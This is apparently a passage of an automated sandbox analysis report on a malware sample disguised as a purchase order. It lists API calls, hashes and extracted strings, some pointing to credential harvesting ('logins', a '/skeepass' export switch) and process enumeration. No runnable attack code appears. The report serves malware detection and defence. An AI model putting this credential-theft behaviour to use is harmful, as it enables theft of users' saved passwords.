                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1043902810-0
                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                      • API String ID: 3330709923-517860148
                                                                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                      • String ID: logins$null
                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID: ---
                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010922700-0
                                                                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2012295524-70141382
                                                                                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                      • API String ID: 667068680-3953557276
                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1700100422-0
                                                                                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 552707033-0
                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                      Strings
                                                                                                      Memory Dump Source
